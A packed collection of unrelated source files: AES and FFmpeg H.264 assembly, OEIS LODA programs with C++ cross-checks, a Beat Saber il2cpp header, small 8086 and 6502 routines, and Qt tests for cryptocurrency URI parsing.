; "state" and "args" are the same address, arg1
; len is arg2
call AES_CBC_ENC_X16
; state and idx are intact
len_is_0:
; process completed job "idx"
mov job_rax, [state + _aes_job_in_lane + idx*8]
mov unused_lanes, [state + _aes_unused_lanes]
mov qword [state + _aes_job_in_lane + idx*8], 0
or dword [job_rax + _status], STS_COMPLETED_AES
shl unused_lanes, 4
or unused_lanes, idx
mov [state + _aes_unused_lanes], unused_lanes
sub qword [state + _aes_lanes_in_use], 1
%ifdef SAFE_DATA
;; Clear IV
vpxorq xmm0, xmm0
shl idx, 4 ; multiply by 16
vmovdqa [state + _aes_args_IV + idx], xmm0
;; Clear expanded keys
%assign round 0
%rep NUM_KEYS
vmovdqa [state + _aesarg_key_tab + round * (16*16) + idx], xmm0
%assign round (round + 1)
%endrep
%endif
return:
mov rbx, [rsp + _gpr_save + 8*0]
mov rbp, [rsp + _gpr_save + 8*1]
mov r12, [rsp + _gpr_save + 8*2]
mov r13, [rsp + _gpr_save + 8*3]
mov r14, [rsp + _gpr_save + 8*4]
mov r15, [rsp + _gpr_save + 8*5]
%ifndef LINUX
mov rsi, [rsp + _gpr_save + 8*6]
mov rdi, [rsp + _gpr_save + 8*7]
%endif
mov rsp, [rsp + _rsp_save] ; original SP
ret
return_null:
xor job_rax, job_rax
jmp return
%ifdef LINUX
section .note.GNU-stack noalloc noexec nowrite progbits
%endif
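SUBMIT_JOB_AES_ENC above keeps the free-lane list packed four bits per lane in a single GPR: the low nibble is the next lane to hand out, and freed lanes are shifted back in from the bottom. A small C++ model of that bookkeeping (the struct and names are mine; the shift/mask steps mirror the asm):

#include <cstdint>

struct LaneList {
    uint64_t packed;  // 16 lane indices, 4 bits each, next lane in the low nibble

    int pop() {                   // mov lane, unused_lanes / and lane, 0xF
        int lane = packed & 0xF;  // / shr unused_lanes, 4
        packed >>= 4;
        return lane;
    }
    void push(int lane) {         // shl unused_lanes, 4 / or unused_lanes, idx
        packed = (packed << 4) | static_cast<uint64_t>(lane & 0xF);
    }
};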
|
; A061313: Minimal number of steps to get from 1 to n by (a) subtracting 1 or (b) multiplying by 2.
; 0,1,3,2,5,4,4,3,7,6,6,5,6,5,5,4,9,8,8,7,8,7,7,6,8,7,7,6,7,6,6,5,11,10,10,9,10,9,9,8,10,9,9,8,9,8,8,7,10,9,9,8,9,8,8,7,9,8,8,7,8,7,7,6,13,12,12,11,12,11,11,10,12,11,11,10,11,10,10,9,12,11,11,10,11,10,10,9,11,10,10,9,10,9,9,8,12,11,11,10,11,10,10,9,11,10,10,9,10,9,9,8,11,10,10,9,10,9,9,8,10,9,9,8,9,8,8,7,15,14,14,13,14,13,13,12,14,13,13,12,13,12,12,11,14,13,13,12,13,12,12,11,13,12,12,11,12,11,11,10,14,13,13,12,13,12,12,11,13,12,12,11,12,11,11,10,13,12,12,11,12,11,11,10,12,11,11,10,11,10,10,9,14,13,13,12,13,12,12,11,13,12,12,11,12,11,11,10,13,12,12,11,12,11,11,10,12,11,11,10,11,10,10,9,13,12,12,11,12,11,11,10,12,11,11,10,11,10,10,9,12,11,11,10,11,10,10,9,11,10
mov $2,$0
lpb $0
gcd $0,2
add $1,$0
div $2,2
mov $0,$2
lpe
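The LODA program above is machine-generated; as a readable cross-check of the definition, a C++ sketch that searches backwards from n with the inverse moves (+1, and /2 when even). BFS guarantees the minimum, and values above 2n can never lie on an optimal path, since doubling from a value already at or above n only adds steps.

#include <queue>
#include <unordered_map>

// a(n): fewest (subtract 1 / multiply by 2) steps from 1 to n.
int a061313(long long n) {
    std::unordered_map<long long, int> dist{{n, 0}};
    std::queue<long long> q;
    q.push(n);
    while (!q.empty()) {
        long long v = q.front(); q.pop();
        if (v == 1) return dist[v];
        long long next[2] = {v + 1, v % 2 == 0 ? v / 2 : -1};
        for (long long w : next)
            if (w > 0 && w <= 2 * n && !dist.count(w)) {
                dist[w] = dist[v] + 1;
                q.push(w);
            }
    }
    return -1;  // not reached for n >= 1
}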
|
// __BEGIN_LICENSE__
// Copyright (C) 2006-2011 United States Government as represented by
// the Administrator of the National Aeronautics and Space Administration.
// All Rights Reserved.
// __END_LICENSE__
#include <vw/Plate/detail/Index.h>
#include <vw/Plate/detail/RemoteIndex.h>
#include <vw/Plate/detail/LocalIndex.h>
#include <vw/Plate/HTTPUtils.h>
using namespace vw::platefile;
using namespace vw::platefile::detail;
boost::shared_ptr<Index> Index::construct_create(const Url& url, const IndexHeader& new_index_info) {
if (url.scheme() == "file")
return boost::shared_ptr<Index>(new LocalIndex(url.path(), new_index_info));
else
return boost::shared_ptr<Index>(new RemoteIndex(url, new_index_info));
}
boost::shared_ptr<Index> Index::construct_open(const Url& url) {
if (url.scheme() == "file")
return boost::shared_ptr<Index>(new LocalIndex(url.path()));
else
return boost::shared_ptr<Index>(new RemoteIndex(url));
}
|
; A210062: Number of digits in 7^n.
; Submitted by Christian Krause
; 1,1,2,3,4,5,6,6,7,8,9,10,11,11,12,13,14,15,16,17,17,18,19,20,21,22,22,23,24,25,26,27,28,28,29,30,31,32,33,33,34,35,36,37,38,39,39,40,41,42,43,44,44,45,46,47,48,49,50,50,51,52,53,54,55,55,56,57,58,59,60,61,61,62,63,64,65,66,66,67,68,69,70,71,71,72,73,74,75,76,77,77,78,79,80,81,82,82,83,84
mov $2,$0
mov $0,7
pow $0,$2
lpb $0
div $0,10
add $1,64
lpe
mov $0,$1
div $0,64
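For comparison with the digit-counting loop above, the count has the usual closed form a(n) = floor(n*log10(7)) + 1. A one-line C++ version (double precision is adequate for the range shown; exact big-integer counting would be needed far beyond it):

#include <cmath>

long long a210062(long long n) {
    return static_cast<long long>(std::floor(n * std::log10(7.0))) + 1;
}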
|
// Autogenerated from CppHeaderCreator
// Created by Sc2ad
// =========================================================================
#pragma once
// Begin includes
#include "extern/beatsaber-hook/shared/utils/typedefs.h"
#include "extern/beatsaber-hook/shared/utils/byref.hpp"
// Including type: HMUI.ContainerViewController
#include "HMUI/ContainerViewController.hpp"
#include "extern/beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
#include "extern/beatsaber-hook/shared/utils/il2cpp-utils-properties.hpp"
#include "extern/beatsaber-hook/shared/utils/il2cpp-utils-fields.hpp"
#include "extern/beatsaber-hook/shared/utils/utils.h"
// Completed includes
// Begin forward declares
// Forward declaring namespace: HMUI
namespace HMUI {
// Skipping declaration: ViewController because it is already included!
}
// Forward declaring namespace: System
namespace System {
// Forward declaring type: Action
class Action;
}
// Forward declaring namespace: System::Collections::Generic
namespace System::Collections::Generic {
// Forward declaring type: List`1<T>
template<typename T>
class List_1;
}
// Completed forward declares
// Type namespace: HMUI
namespace HMUI {
// Forward declaring type: StackedController
class StackedController;
}
#include "extern/beatsaber-hook/shared/utils/il2cpp-type-check.hpp"
NEED_NO_BOX(HMUI::StackedController);
DEFINE_IL2CPP_ARG_TYPE(HMUI::StackedController*, "HMUI", "StackedController");
// Type namespace: HMUI
namespace HMUI {
// Size: 0x80
#pragma pack(push, 1)
// Autogenerated type: HMUI.StackedController
// [TokenAttribute] Offset: FFFFFFFF
class StackedController : public HMUI::ContainerViewController {
public:
// Nested type: HMUI::StackedController::$$c
class $$c;
// Nested type: HMUI::StackedController::$$c__DisplayClass5_0
class $$c__DisplayClass5_0;
// public HMUI.ViewController get_topStackedViewController()
// Offset: 0x1400D4C
HMUI::ViewController* get_topStackedViewController();
// public System.Void PushViewController(HMUI.ViewController viewController, System.Action finishedCallback, System.Boolean immediately)
// Offset: 0x1400F80
void PushViewController(HMUI::ViewController* viewController, System::Action* finishedCallback, bool immediately);
// public System.Void PopViewController(System.Action finishedCallback, System.Boolean immediately)
// Offset: 0x1401054
void PopViewController(System::Action* finishedCallback, bool immediately);
// public System.Void PopViewControllers(System.Int32 numberOfViewControllersToPop, System.Action finishedCallback, System.Boolean immediately)
// Offset: 0x1401068
void PopViewControllers(int numberOfViewControllersToPop, System::Action* finishedCallback, bool immediately);
// static private System.Void SetupViewControllerRect(HMUI.ViewController viewController, System.Int32 index)
// Offset: 0x1400EFC
static void SetupViewControllerRect(HMUI::ViewController* viewController, int index);
// public System.Void .ctor()
// Offset: 0x1401200
// Implemented from: HMUI.ContainerViewController
// Base method: System.Void ContainerViewController::.ctor()
// Base method: System.Void ViewController::.ctor()
// Base method: System.Void MonoBehaviour::.ctor()
// Base method: System.Void Behaviour::.ctor()
// Base method: System.Void Component::.ctor()
// Base method: System.Void Object::.ctor()
// Base method: System.Void Object::.ctor()
template<::il2cpp_utils::CreationType creationType = ::il2cpp_utils::CreationType::Temporary>
static StackedController* New_ctor() {
static auto ___internal__logger = ::Logger::get().WithContext("HMUI::StackedController::.ctor");
return THROW_UNLESS((::il2cpp_utils::New<StackedController*, creationType>()));
}
// protected override System.Void LayoutViewControllers(System.Collections.Generic.List`1<HMUI.ViewController> viewControllers)
// Offset: 0x1400DB8
// Implemented from: HMUI.ContainerViewController
// Base method: System.Void ContainerViewController::LayoutViewControllers(System.Collections.Generic.List`1<HMUI.ViewController> viewControllers)
void LayoutViewControllers(System::Collections::Generic::List_1<HMUI::ViewController*>* viewControllers);
}; // HMUI.StackedController
#pragma pack(pop)
}
#include "extern/beatsaber-hook/shared/utils/il2cpp-utils-methods.hpp"
// Writing MetadataGetter for method: HMUI::StackedController::get_topStackedViewController
// Il2CppName: get_topStackedViewController
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<HMUI::ViewController* (HMUI::StackedController::*)()>(&HMUI::StackedController::get_topStackedViewController)> {
static const MethodInfo* get() {
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "get_topStackedViewController", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::PushViewController
// Il2CppName: PushViewController
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (HMUI::StackedController::*)(HMUI::ViewController*, System::Action*, bool)>(&HMUI::StackedController::PushViewController)> {
static const MethodInfo* get() {
static auto* viewController = &::il2cpp_utils::GetClassFromName("HMUI", "ViewController")->byval_arg;
static auto* finishedCallback = &::il2cpp_utils::GetClassFromName("System", "Action")->byval_arg;
static auto* immediately = &::il2cpp_utils::GetClassFromName("System", "Boolean")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "PushViewController", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{viewController, finishedCallback, immediately});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::PopViewController
// Il2CppName: PopViewController
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (HMUI::StackedController::*)(System::Action*, bool)>(&HMUI::StackedController::PopViewController)> {
static const MethodInfo* get() {
static auto* finishedCallback = &::il2cpp_utils::GetClassFromName("System", "Action")->byval_arg;
static auto* immediately = &::il2cpp_utils::GetClassFromName("System", "Boolean")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "PopViewController", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{finishedCallback, immediately});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::PopViewControllers
// Il2CppName: PopViewControllers
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (HMUI::StackedController::*)(int, System::Action*, bool)>(&HMUI::StackedController::PopViewControllers)> {
static const MethodInfo* get() {
static auto* numberOfViewControllersToPop = &::il2cpp_utils::GetClassFromName("System", "Int32")->byval_arg;
static auto* finishedCallback = &::il2cpp_utils::GetClassFromName("System", "Action")->byval_arg;
static auto* immediately = &::il2cpp_utils::GetClassFromName("System", "Boolean")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "PopViewControllers", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{numberOfViewControllersToPop, finishedCallback, immediately});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::SetupViewControllerRect
// Il2CppName: SetupViewControllerRect
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (*)(HMUI::ViewController*, int)>(&HMUI::StackedController::SetupViewControllerRect)> {
static const MethodInfo* get() {
static auto* viewController = &::il2cpp_utils::GetClassFromName("HMUI", "ViewController")->byval_arg;
static auto* index = &::il2cpp_utils::GetClassFromName("System", "Int32")->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "SetupViewControllerRect", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{viewController, index});
}
};
// Writing MetadataGetter for method: HMUI::StackedController::New_ctor
// Il2CppName: .ctor
// Cannot get method pointer of value based method overload from template for constructor!
// Try using FindMethod instead!
// Writing MetadataGetter for method: HMUI::StackedController::LayoutViewControllers
// Il2CppName: LayoutViewControllers
template<>
struct ::il2cpp_utils::il2cpp_type_check::MetadataGetter<static_cast<void (HMUI::StackedController::*)(System::Collections::Generic::List_1<HMUI::ViewController*>*)>(&HMUI::StackedController::LayoutViewControllers)> {
static const MethodInfo* get() {
static auto* viewControllers = &::il2cpp_utils::MakeGeneric(::il2cpp_utils::GetClassFromName("System.Collections.Generic", "List`1"), ::std::vector<const Il2CppClass*>{::il2cpp_utils::GetClassFromName("HMUI", "ViewController")})->byval_arg;
return ::il2cpp_utils::FindMethod(classof(HMUI::StackedController*), "LayoutViewControllers", std::vector<Il2CppClass*>(), ::std::vector<const Il2CppType*>{viewControllers});
}
};
|
; WAP (Write an Assembly Program) to set the rightmost 4 bits of BX to 1.
.MODEL TINY
.CODE
.STARTUP
MOV BX, 0H
OR BX, 000FH ; mask 000FH sets bits 3-0
.EXIT
END |
;-----------------------------------------------------------------------------
; Paul Wasson - 2021
;-----------------------------------------------------------------------------
; Zero page usage
sourcePtr0 := $5A
sourcePtr1 := $5B
destPtr0 := $5C
destPtr1 := $5D
stackPtr0 := $5E
stackPtr1 := $5F
sourceEnd0 := $60 ; assumed-free locations; hold the inline source-end parameter
sourceEnd1 := $61
;-----------------------------------------------------------------------------
; Copy - copy memory
;-----------------------------------------------------------------------------
; Inline parameters specify the source start, source end, and destination
; clobbers A,X,Y
;
; Example:
; jsr memory_copy
; .word source_start
; .word source_end
; .word dest_start
; <next instruction>
.proc memory_copy
; Pop the return address; JSR pushes the address of its own last byte,
; which points one byte before the parameters, hence Y starts at 1 below
pla
sta stackPtr0
pla
sta stackPtr1
; source_start
ldy #1
lda (stackPtr0),y
sta sourcePtr0
iny
lda (stackPtr0),y
sta sourcePtr1
; source_end
iny
lda (stackPtr0),y
sta sourceEnd0
iny
lda (stackPtr0),y
sta sourceEnd1
; dest
iny
lda (stackPtr0),y
sta destPtr0
iny
lda (stackPtr0),y
sta destPtr1
ldy #0
; copy loop: move bytes from sourcePtr to destPtr until sourcePtr
; reaches sourceEnd (end is exclusive)
copy_loop:
lda sourcePtr0
cmp sourceEnd0
bne copy_byte
lda sourcePtr1
cmp sourceEnd1
beq copy_done
copy_byte:
lda (sourcePtr0),y ; y stays 0
sta (destPtr0),y
inc sourcePtr0 ; 16-bit increment of source pointer
bne advance_dest
inc sourcePtr1
advance_dest:
inc destPtr0 ; 16-bit increment of dest pointer
bne copy_loop
inc destPtr1
jmp copy_loop
copy_done:
; calculate return address
lda stackPtr0
clc
adc #6 ; 6 bytes of parameters
tax ; save a copy
lda stackPtr1
adc #0 ; propagate the carry from the low-byte add
pha
txa
pha
rts
.endproc ; memory_copy
|
; A054103: T(n,n-3), array T as in A054098.
; Submitted by Christian Krause
; 1,14,30,148,744,4610,32870,266972,2431608,24554194,272289630,3289836260,43017800312,605289111698,9119314568454,146474344313980,2498617856687400
mov $1,9
mov $3,$0
mov $4,4
lpb $3
add $1,$4
mul $2,-1
add $2,$1
div $1,2
add $4,2
mul $1,$4
sub $3,1
lpe
mov $0,$2
add $0,1
|
#include <axxegro/event/EventSource.hpp>
#include <stdexcept>
al::UserEventSource& al::GetUserEventSource(const ALLEGRO_EVENT& ev)
{
if(ev.type < 1024) {
throw std::runtime_error("GetUserEventSource called on non-user event");
}
return *(UserEventSource*)al_get_event_source_data(ev.any.source);
}
|
; A067324: Third column of triangle A067323.
; Submitted by Jon Maiga
; 2,7,23,76,255,869,3003,10504,37128,132430,476102,1723528,6277505,22988385,84592275,312636240,1159979700,4319218530,16134883410,60452176200,227110782990,855361970034,3228982640478
mov $3,2
mov $5,$0
lpb $3
mov $0,$5
sub $3,1
add $0,$3
mov $6,$0
mov $8,2
lpb $8
mov $0,$6
sub $8,1
add $0,$8
trn $0,1
seq $0,1453 ; Catalan numbers - 1.
mov $9,$8
mul $9,$0
add $7,$9
lpe
min $6,1
mul $6,$0
mov $0,$7
sub $0,$6
mov $2,$3
mul $2,$0
mov $0,$6
add $4,$2
lpe
min $5,1
mul $5,$0
mov $0,$4
sub $0,$5
sub $0,1
|
; ---------------------------------------------------------------------------
; Sprite mappings - rings
; ---------------------------------------------------------------------------
dc.w byte_9FA2-Map_obj25, byte_9FA8-Map_obj25
dc.w byte_9FAE-Map_obj25, byte_9FB4-Map_obj25
dc.w byte_9FBA-Map_obj25, byte_9FC0-Map_obj25
dc.w byte_9FC6-Map_obj25, byte_9FCC-Map_obj25
byte_9FA2: dc.b 1
dc.b $F8, 5, 0, 0, $F8
byte_9FA8: dc.b 1
dc.b $F8, 5, 0, 4, $F8
byte_9FAE: dc.b 1
dc.b $F8, 1, 0, 8, $FC
byte_9FB4: dc.b 1
dc.b $F8, 5, 8, 4, $F8
byte_9FBA: dc.b 1
dc.b $F8, 5, 0, $A, $F8
byte_9FC0: dc.b 1
dc.b $F8, 5, $18, $A, $F8
byte_9FC6: dc.b 1
dc.b $F8, 5, 8, $A, $F8
byte_9FCC: dc.b 1
dc.b $F8, 5, $10, $A, $F8
even |
#include "uritests.h"
#include "../guiutil.h"
#include "../walletmodel.h"
#include <QUrl>
void URITests::uriTests()
{
SendCoinsRecipient rv;
QUrl uri;
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?req-dontexist="));
QVERIFY(!GUIUtil::parseBitcoinURI(uri, &rv));
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?dontexist="));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
QVERIFY(rv.amount == 0);
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?label=Wikipedia Example Address"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString("Wikipedia Example Address"));
QVERIFY(rv.amount == 0);
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=0.001"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
QVERIFY(rv.amount == 100000);
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=1.001"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
QVERIFY(rv.amount == 100100000);
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=100&label=Wikipedia Example"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.amount == 10000000000LL);
QVERIFY(rv.label == QString("Wikipedia Example"));
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?message=Wikipedia Example Address"));
QVERIFY(GUIUtil::parseBitcoinURI(uri, &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
QVERIFY(GUIUtil::parseBitcoinURI("KazukiCoin://LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?message=Wikipedia Example Address", &rv));
QVERIFY(rv.address == QString("LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9"));
QVERIFY(rv.label == QString());
// We currently don't implement the message parameter (ok, yea, we break spec...)
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?req-message=Wikipedia Example Address"));
QVERIFY(!GUIUtil::parseBitcoinURI(uri, &rv));
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=1,000&label=Wikipedia Example"));
QVERIFY(!GUIUtil::parseBitcoinURI(uri, &rv));
uri.setUrl(QString("KazukiCoin:LQDPC5rbjDB72fGFVHu4enYhxGAZuRiFh9?amount=1,000.0&label=Wikipedia Example"));
QVERIFY(!GUIUtil::parseBitcoinURI(uri, &rv));
}
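The expected amounts above encode the usual 10^8 base units per coin (0.001 -> 100000, 1.001 -> 100100000, 100 -> 10000000000). A tiny compile-time check of the conversion these tests rely on; COIN_ASSUMED is my name, not one from the codebase:

#include <cstdint>

static const int64_t COIN_ASSUMED = 100000000;  // base units per coin
static_assert(100 * COIN_ASSUMED == 10000000000LL,
              "100 coins in base units, as the last amount test expects");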
|
;*****************************************************************************
;* MMX/SSE2/AVX-optimized 10-bit H.264 intra prediction code
;*****************************************************************************
;* Copyright (C) 2005-2011 x264 project
;*
;* Authors: Daniel Kang <daniel.d.kang@gmail.com>
;*
;* This file is part of FFmpeg.
;*
;* FFmpeg is free software; you can redistribute it and/or
;* modify it under the terms of the GNU Lesser General Public
;* License as published by the Free Software Foundation; either
;* version 2.1 of the License, or (at your option) any later version.
;*
;* FFmpeg is distributed in the hope that it will be useful,
;* but WITHOUT ANY WARRANTY; without even the implied warranty of
;* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
;* Lesser General Public License for more details.
;*
;* You should have received a copy of the GNU Lesser General Public
;* License along with FFmpeg; if not, write to the Free Software
;* Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
;******************************************************************************
%include "libavutil/x86/x86util.asm"
SECTION_RODATA
cextern pw_512
cextern pw_16
cextern pw_8
cextern pw_4
cextern pw_2
cextern pw_1
pw_m32101234: dw -3, -2, -1, 0, 1, 2, 3, 4
pw_m3: times 8 dw -3
pw_pixel_max: times 8 dw ((1 << 10)-1)
pd_17: times 4 dd 17
pd_16: times 4 dd 16
SECTION .text
; dest, left, right, src
; output: %1 = (t[n-1] + t[n]*2 + t[n+1] + 2) >> 2
%macro PRED4x4_LOWPASS 4
paddw %2, %3
psrlw %2, 1
pavgw %1, %4, %2
%endmacro
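Per sample, the macro computes avg(src, (left+right)>>1) with pavgw's round-up, which is bit-exact with the (t[n-1] + t[n]*2 + t[n+1] + 2) >> 2 formula in the comment: the low bit dropped from left+right can never change the result, because the other rounded term is always even. A scalar C++ rendering for reference:

#include <cstdint>

// Scalar PRED4x4_LOWPASS: (left + 2*src + right + 2) >> 2, computed the
// same way as the macro (paddw + psrlw, then pavgw).
uint16_t lowpass10(uint16_t left, uint16_t src, uint16_t right) {
    unsigned t = (unsigned(left) + right) >> 1;  // paddw; psrlw 1
    return uint16_t((src + t + 1) >> 1);         // pavgw rounds up
}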
;-----------------------------------------------------------------------------
; void ff_pred4x4_down_right(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED4x4_DR 0
cglobal pred4x4_down_right_10, 3, 3
sub r0, r2
lea r1, [r0+r2*2]
movhps m1, [r1-8]
movhps m2, [r0+r2*1-8]
movhps m4, [r0-8]
punpckhwd m2, m4
movq m3, [r0]
punpckhdq m1, m2
PALIGNR m3, m1, 10, m1
movhps m4, [r1+r2*1-8]
PALIGNR m0, m3, m4, 14, m4
movhps m4, [r1+r2*2-8]
PALIGNR m2, m0, m4, 14, m4
PRED4x4_LOWPASS m0, m2, m3, m0
movq [r1+r2*2], m0
psrldq m0, 2
movq [r1+r2*1], m0
psrldq m0, 2
movq [r0+r2*2], m0
psrldq m0, 2
movq [r0+r2*1], m0
RET
%endmacro
INIT_XMM sse2
PRED4x4_DR
INIT_XMM ssse3
PRED4x4_DR
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_DR
%endif
;------------------------------------------------------------------------------
; void ff_pred4x4_vertical_right(pixel *src, const pixel *topright, int stride)
;------------------------------------------------------------------------------
%macro PRED4x4_VR 0
cglobal pred4x4_vertical_right_10, 3, 3, 6
sub r0, r2
lea r1, [r0+r2*2]
movq m5, [r0] ; ........t3t2t1t0
movhps m1, [r0-8]
PALIGNR m0, m5, m1, 14, m1 ; ......t3t2t1t0lt
pavgw m5, m0
movhps m1, [r0+r2*1-8]
PALIGNR m0, m1, 14, m1 ; ....t3t2t1t0ltl0
movhps m2, [r0+r2*2-8]
PALIGNR m1, m0, m2, 14, m2 ; ..t3t2t1t0ltl0l1
movhps m3, [r1+r2*1-8]
PALIGNR m2, m1, m3, 14, m3 ; t3t2t1t0ltl0l1l2
PRED4x4_LOWPASS m1, m0, m2, m1
pslldq m0, m1, 12
psrldq m1, 4
movq [r0+r2*1], m5
movq [r0+r2*2], m1
PALIGNR m5, m0, 14, m2
pslldq m0, 2
movq [r1+r2*1], m5
PALIGNR m1, m0, 14, m0
movq [r1+r2*2], m1
RET
%endmacro
INIT_XMM sse2
PRED4x4_VR
INIT_XMM ssse3
PRED4x4_VR
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_VR
%endif
;-------------------------------------------------------------------------------
; void ff_pred4x4_horizontal_down(pixel *src, const pixel *topright, int stride)
;-------------------------------------------------------------------------------
%macro PRED4x4_HD 0
cglobal pred4x4_horizontal_down_10, 3, 3
sub r0, r2
lea r1, [r0+r2*2]
movq m0, [r0-8] ; lt ..
movhps m0, [r0]
pslldq m0, 2 ; t2 t1 t0 lt .. .. .. ..
movq m1, [r1+r2*2-8] ; l3
movq m3, [r1+r2*1-8]
punpcklwd m1, m3 ; l2 l3
movq m2, [r0+r2*2-8] ; l1
movq m3, [r0+r2*1-8]
punpcklwd m2, m3 ; l0 l1
punpckhdq m1, m2 ; l0 l1 l2 l3
punpckhqdq m1, m0 ; t2 t1 t0 lt l0 l1 l2 l3
psrldq m0, m1, 4 ; .. .. t2 t1 t0 lt l0 l1
psrldq m3, m1, 2 ; .. t2 t1 t0 lt l0 l1 l2
pavgw m5, m1, m3
PRED4x4_LOWPASS m3, m1, m0, m3
punpcklwd m5, m3
psrldq m3, 8
PALIGNR m3, m5, 12, m4
movq [r1+r2*2], m5
movhps [r0+r2*2], m5
psrldq m5, 4
movq [r1+r2*1], m5
movq [r0+r2*1], m3
RET
%endmacro
INIT_XMM sse2
PRED4x4_HD
INIT_XMM ssse3
PRED4x4_HD
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_HD
%endif
;-----------------------------------------------------------------------------
; void ff_pred4x4_dc(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
INIT_MMX mmxext
cglobal pred4x4_dc_10, 3, 3
sub r0, r2
lea r1, [r0+r2*2]
movq m2, [r0+r2*1-8]
paddw m2, [r0+r2*2-8]
paddw m2, [r1+r2*1-8]
paddw m2, [r1+r2*2-8]
psrlq m2, 48
movq m0, [r0]
HADDW m0, m1
paddw m0, [pw_4]
paddw m0, m2
psrlw m0, 3
SPLATW m0, m0, 0
movq [r0+r2*1], m0
movq [r0+r2*2], m0
movq [r1+r2*1], m0
movq [r1+r2*2], m0
RET
;-----------------------------------------------------------------------------
; void ff_pred4x4_down_left(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED4x4_DL 0
cglobal pred4x4_down_left_10, 3, 3
sub r0, r2
movq m0, [r0]
movhps m0, [r1]
psrldq m2, m0, 2
pslldq m3, m0, 2
pshufhw m2, m2, 10100100b
PRED4x4_LOWPASS m0, m3, m2, m0
lea r1, [r0+r2*2]
movhps [r1+r2*2], m0
psrldq m0, 2
movq [r0+r2*1], m0
psrldq m0, 2
movq [r0+r2*2], m0
psrldq m0, 2
movq [r1+r2*1], m0
RET
%endmacro
INIT_XMM sse2
PRED4x4_DL
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_DL
%endif
;-----------------------------------------------------------------------------
; void ff_pred4x4_vertical_left(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
%macro PRED4x4_VL 0
cglobal pred4x4_vertical_left_10, 3, 3
sub r0, r2
movu m1, [r0]
movhps m1, [r1]
psrldq m0, m1, 2
psrldq m2, m1, 4
pavgw m4, m0, m1
PRED4x4_LOWPASS m0, m1, m2, m0
lea r1, [r0+r2*2]
movq [r0+r2*1], m4
movq [r0+r2*2], m0
psrldq m4, 2
psrldq m0, 2
movq [r1+r2*1], m4
movq [r1+r2*2], m0
RET
%endmacro
INIT_XMM sse2
PRED4x4_VL
%if HAVE_AVX_EXTERNAL
INIT_XMM avx
PRED4x4_VL
%endif
;-----------------------------------------------------------------------------
; void ff_pred4x4_horizontal_up(pixel *src, const pixel *topright, int stride)
;-----------------------------------------------------------------------------
INIT_MMX mmxext
cglobal pred4x4_horizontal_up_10, 3, 3
sub r0, r2
lea r1, [r0+r2*2]
movq m0, [r0+r2*1-8]
punpckhwd m0, [r0+r2*2-8]
movq m1, [r1+r2*1-8]
punpckhwd m1, [r1+r2*2-8]
punpckhdq m0, m1
